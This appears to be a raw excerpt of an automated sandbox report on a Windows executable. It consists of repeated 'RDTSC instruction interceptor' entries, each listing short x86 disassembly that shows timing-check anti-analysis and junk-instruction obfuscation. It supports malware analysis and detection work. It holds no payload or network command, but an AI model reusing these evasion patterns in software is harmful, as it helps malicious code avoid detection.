Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0AC2 second address: 71F0ADF instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F78B909B0FDh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ADF second address: 71F0AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0AE3 second address: 71F0AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0AE9 second address: 71F0B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F78B9095CF0h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bl, C5h 0x00000017 mov ax, 1365h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0B1D second address: 71F0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov esi, edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F78B909B0FDh 0x00000019 or eax, 55DE9766h 0x0000001f jmp 00007F78B909B101h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0B5C second address: 71F0B82 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 7A429B97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CF9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0B82 second address: 71F0B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0BEC second address: 71F0BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0BF2 second address: 71F0C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C0A second address: 71F0C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C27 second address: 71F0C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C2D second address: 71F0C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7929064763h 0x00000011 jmp 00007F78B9095CF6h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F78B9095CEAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C73 second address: 71F0C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C77 second address: 71F0C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C7D second address: 71F0CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F78B909B100h 0x00000011 lea eax, dword ptr [ebx+78h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F78B909B107h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0CBE second address: 71F0CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0CD6 second address: 71F0CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movsx edx, ax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0CE6 second address: 71F0D00 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 5BB52657h 0x0000000b popad 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, 40BAh 0x00000014 mov ebx, 6B67AE86h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D00 second address: 71F0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D06 second address: 71F0D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D0A second address: 71F0D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D0E second address: 71F0D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CF7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D32 second address: 71F0D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D36 second address: 71F0D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0E8A second address: 71F0ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test edi, edi 0x00000008 jmp 00007F78B909B106h 0x0000000d js 00007F7929069907h 0x00000013 jmp 00007F78B909B100h 0x00000018 mov eax, dword ptr [ebp-04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F78B909B0FAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ECF second address: 71F0ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ED3 second address: 71F0ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ED9 second address: 71F0F0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007F78B9095CF5h 0x00000010 lea eax, dword ptr [ebx+70h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F78B9095CEDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F0B second address: 71F0F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B0FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F1B second address: 71F0F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F1F second address: 71F0F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 popad 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F78B909B0FDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F42 second address: 71F0F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F78B9095CEFh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, edi 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F64 second address: 71F0F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e pushad 0x0000000f mov edx, eax 0x00000011 mov di, cx 0x00000014 popad 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edx, 0DE92E10h 0x0000001e mov dx, 1B3Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F87 second address: 71F0FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F78B9095CEBh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ah, dh 0x00000015 mov ecx, 696EE2A3h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0FB5 second address: 71F0FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0FBB second address: 71F0FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0FBF second address: 71F0FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F103A second address: 71F10E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F78B9095CF7h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F78B9095CF9h 0x0000000f add ah, 00000026h 0x00000012 jmp 00007F78B9095CF1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e jmp 00007F78B9095CEEh 0x00000023 mov ecx, esi 0x00000025 jmp 00007F78B9095CF0h 0x0000002a mov dword ptr [esi+0Ch], eax 0x0000002d jmp 00007F78B9095CF0h 0x00000032 mov edx, 772406ECh 0x00000037 jmp 00007F78B9095CF0h 0x0000003c sub eax, eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F78B9095CEDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F10E4 second address: 71F11D4 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1CA22C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 3B2B81A3h 0x0000000e popad 0x0000000f lock cmpxchg dword ptr [edx], ecx 0x00000013 jmp 00007F78B909B106h 0x00000018 pop edi 0x00000019 jmp 00007F78B909B100h 0x0000001e test eax, eax 0x00000020 jmp 00007F78B909B100h 0x00000025 jne 00007F79290696A2h 0x0000002b pushad 0x0000002c mov bx, ax 0x0000002f pushfd 0x00000030 jmp 00007F78B909B0FAh 0x00000035 sbb esi, 67BEF478h 0x0000003b jmp 00007F78B909B0FBh 0x00000040 popfd 0x00000041 popad 0x00000042 mov edx, dword ptr [ebp+08h] 0x00000045 jmp 00007F78B909B106h 0x0000004a mov eax, dword ptr [esi] 0x0000004c pushad 0x0000004d push esi 0x0000004e pushfd 0x0000004f jmp 00007F78B909B0FDh 0x00000054 adc ax, F7C6h 0x00000059 jmp 00007F78B909B101h 0x0000005e popfd 0x0000005f pop ecx 0x00000060 mov si, dx 0x00000063 popad 0x00000064 mov dword ptr [edx], eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushfd 0x0000006a jmp 00007F78B909B0FFh 0x0000006f add esi, 2962DEFEh 0x00000075 jmp 00007F78B909B109h 0x0000007a popfd 0x0000007b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F11D4 second address: 71F11F3 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CF2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F11F3 second address: 71F1222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 jmp 00007F78B909B107h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1222 second address: 71F128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c pushad 0x0000000d movzx eax, di 0x00000010 mov cx, bx 0x00000013 popad 0x00000014 mov dword ptr [edx+08h], eax 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b mov si, 8FA9h 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+0Ch] 0x00000023 jmp 00007F78B9095CF4h 0x00000028 mov dword ptr [edx+0Ch], eax 0x0000002b pushad 0x0000002c mov edx, ecx 0x0000002e popad 0x0000002f mov eax, dword ptr [esi+10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F78B9095CF2h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F128B second address: 71F1291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1291 second address: 71F1323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e pushad 0x0000000f mov bl, cl 0x00000011 mov edi, 630AA74Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+14h] 0x0000001a pushad 0x0000001b mov dx, 93E4h 0x0000001f mov ah, dh 0x00000021 popad 0x00000022 mov dword ptr [edx+14h], eax 0x00000025 jmp 00007F78B9095CF4h 0x0000002a mov eax, dword ptr [esi+18h] 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F78B9095CEEh 0x00000034 add esi, 54CD25C8h 0x0000003a jmp 00007F78B9095CEBh 0x0000003f popfd 0x00000040 movzx esi, dx 0x00000043 popad 0x00000044 mov dword ptr [edx+18h], eax 0x00000047 jmp 00007F78B9095CEBh 0x0000004c mov eax, dword ptr [esi+1Ch] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F78B9095CF5h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1323 second address: 71F13EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e jmp 00007F78B909B104h 0x00000013 mov eax, dword ptr [esi+20h] 0x00000016 jmp 00007F78B909B100h 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e pushad 0x0000001f call 00007F78B909B0FEh 0x00000024 pushfd 0x00000025 jmp 00007F78B909B102h 0x0000002a sbb si, 4F48h 0x0000002f jmp 00007F78B909B0FBh 0x00000034 popfd 0x00000035 pop eax 0x00000036 mov dx, 718Ch 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+24h] 0x0000003e jmp 00007F78B909B0FBh 0x00000043 mov dword ptr [edx+24h], eax 0x00000046 jmp 00007F78B909B106h 0x0000004b mov eax, dword ptr [esi+28h] 0x0000004e jmp 00007F78B909B100h 0x00000053 mov dword ptr [edx+28h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F78B909B107h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F13EA second address: 71F1448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007F78B9095CEEh 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 jmp 00007F78B9095CF0h 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d jmp 00007F78B9095CF0h 0x00000022 mov word ptr [edx+30h], ax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1448 second address: 71F1462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B909B0FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1462 second address: 71F1468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1468 second address: 71F1480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movzx esi, bx 0x00000012 mov edi, 475D36D0h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1480 second address: 71F14BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c jmp 00007F78B9095CF0h 0x00000011 mov dword ptr [edx+34h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edx, ax 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F14BA second address: 71F1531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F78B909B107h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test ecx, 00000700h 0x00000013 jmp 00007F78B909B106h 0x00000018 jne 00007F7929069318h 0x0000001e jmp 00007F78B909B100h 0x00000023 or dword ptr [edx+38h], FFFFFFFFh 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007F78B909B0FDh 0x0000002f call 00007F78B909B100h 0x00000034 pop esi 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1531 second address: 71F159C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000d jmp 00007F78B9095CF0h 0x00000012 or dword ptr [edx+40h], FFFFFFFFh 0x00000016 pushad 0x00000017 mov si, F00Dh 0x0000001b mov di, si 0x0000001e popad 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jmp 00007F78B9095CF1h 0x00000028 pushfd 0x00000029 jmp 00007F78B9095CF0h 0x0000002e sbb al, FFFFFF88h 0x00000031 jmp 00007F78B9095CEBh 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7240C49 second address: 7240C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B104h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 7240C61 second address: 7240C65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71E0771 second address: 71E07AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ah, bh 0x00000011 jmp 00007F78B909B104h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 7180051 second address: 7180058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 7180058 second address: 71800A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, 51h 0x0000000f pushfd 0x00000010 jmp 00007F78B909B104h 0x00000015 add eax, 41C93BE8h 0x0000001b jmp 00007F78B909B0FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71800A3 second address: 71800D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CEDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71800D1 second address: 718010C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F78B909B0FDh 0x0000000b xor cl, 00000066h 0x0000000e jmp 00007F78B909B101h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F78B909B0FDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 718010C second address: 7180112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 7180A66 second address: 7180A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 7180A6C second address: 7180A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 7180A70 second address: 7180A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71D0B21 second address: 71D0B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0008 second address: 71B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B000C second address: 71B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exe | RDTSC instruction interceptor: First address: 71B0012 second address: 71B00C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F78B909B0FEh 0x0000000f push eax 0x00000010 jmp 00007F78B909B0FBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F78B909B104h 0x0000001d or cx, 57C8h 0x00000022 jmp 00007F78B909B0FBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F78B909B108h 0x0000002e add ax, 5A28h 0x00000033 jmp 00007F78B909B0FBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov ebp, esp 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushad 0x00000040 popad 0x00000041 pushfd 0x00000042 jmp 00007F78B909B101h 0x00000047 adc cl, 00000046h 0x0000004a jmp 00007F78B909B101h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
